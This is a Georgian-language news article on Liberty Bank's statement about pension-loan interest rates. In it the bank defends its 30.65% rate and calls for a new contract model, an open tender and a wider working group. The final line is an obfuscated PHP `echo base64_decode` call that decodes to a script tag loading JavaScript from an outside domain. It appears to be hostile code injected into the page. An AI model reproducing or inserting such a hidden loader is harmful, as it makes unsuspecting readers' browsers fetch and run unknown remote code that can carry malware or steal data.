celsiusi
ავერსი საქკაბელი
ღევანდელი მოცემულობა დამაკმაყოფილებელი არ არის არც ერთი მხარისთვის. ამიტომ საჭიროა ახალი, ჯანსაღი მოდელის შემუშავება და მის საფუძველზე, ახალი ტენდერის ჩატარება, ახალი პირობებით, - ამის შესახებ ნათქვამია "ლიბერთი ბანკის" სპეციალური განცხადებაში, რომელიც საპენსიო სესხების საპროცენტო განაკვეთის თემის ირგვლივ განვითარებულ პროცესებს ეხება.
 
ამავე განცხადებაში საუბარია, რომ „ლიბერთიმ“ არაერთხელ დააფიქსირა მზაობა და დღესაც მიესალმება უახლოეს მომავალში, სრულიად გამჭვირვალე და ღია ტენდერის ჩატარებას, რომელიც გაითვალისწინებს ყველა მხარის - ბენეფიციარების, სახელმწიფოს და ბიზნესის კომერციულ ინტერესებს“
ბანკის მენეჯმენტის შეფასებით, საპენსიო სერვისების გაუმჯობესებაზე დისკუსია, წინასაარჩევნო პოლიტიკური ველიდან საქმიან და შედეგზე ორიენტირებულ ფორმატში უნდა გადავიდეს.
 
„ამ მგრძნობიარე თემით მანიპულირება და ბანკის დისკრედიტაციაზე მიმართული ინფორმაციის გავრცელება სრულიად მიუღებელია ჩვენთვის და დამაზიანებელია პროცესისთვის“, - აღნიშნულია განცხადებაში.
 
ამასთან, „ლიბერთი ბანკში“ მიიჩნევენ, რომ საპენსიო სესხებზე არსებული 30.65% არის ის რეალური ნიშნული, რომელზე ნაკლებადაც სხვა კომერციული ბანკებიც არ გასცემენ მცირე მოცულობის, არაუზრუნველყოფილ სამომხმარებლო სესხს, უფროსი ასაკის მომხმარებელზე.
 
„არსებული კონტრაქტის ფარგლებში, როცა „ლიბერთი“ სხვა არანაირ გადასახადს არ ახდევინებს პენსიის მიმღებ პირებს, 30.65%-დან მიღებული საპროცენტო შემოსავალი სრულად ვერ ანაზღაურებს ბენეფიციარების უფასო მომსახურებასთან დაკავშირებულ დანახარჯებს.
 
ასე რომ, დღევანდელი მოცემულობა დამაკმაყოფილებელი არ არის არც ერთი მხარისთვის. ამიტომ საჭიროა ახალი, ჯანსაღი მოდელის შემუშავება და მის საფუძველზე, ახალი ტენდერის ჩატარება, ახალი პირობებით. ლიბერთიმ არაერთხელ დააფიქსირა მზაობა და დღესაც მიესალმება უახლოეს მომავალში, სრულიად გამჭვირვალე და ღია ტენდერის ჩატარებას, რომელიც გაითვალისწინებს ყველა მხარის - ბენეფიციარების, სახელმწიფოს და ბიზნესის კომერციულ ინტერესებს.
 
2019 წელს, როდესაც მოხდა ძველი პირობებით კონტრაქტის ვადის გაგრძელება, ჩვენი თანხმობის მოტივი იყო, რომ სახელმწიფოს მისცემოდა დრო, შეემუშავებინა ახალი, სამართლიანი პირობები.
 
იმისდა მიუხედავად, რომ პანდემიამ შეაფერხა ეს პროცესი, ლიბერთი აქტიურად მუშაობდა და დღესაც მუშაობს ყველა ჩართულ მხარესთან. თუმცა, ვინაიდან ამ თემასთან დაკავშირებით ინტერესი მატულობს, ლიბერთი რჩება თავისი პოზიციის ერთგული და ვთავზობთ ყველა მხარეს შეიქმნას კიდევ უფრო ფართო ფორმატის სამუშაო ჯგუფი, რომელიც იმუშავებს პენსიების შესახებ კონტრაქტის პირობების გაუმჯობესებასა და დახვეწაზე. ჯგუფში ჩავრთოთ ყველა ის მხარე, ვისაც აქვს კომპეტენცია და რეალურად აღელვებს ეს თემა. პროცესი გავხადოთ კიდევ უფრო ღია და გამჭვირვალე, შევთანხმდეთ და შევქმნათ ახალი, გამართული, ჯანსაღი სისტემა და მომავალი ტენდერი გამოცხადდეს ამ ახალი, გამართული მოდელის საფუძველზე", - ნათქვამია განცხადებაში.
 
1208
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");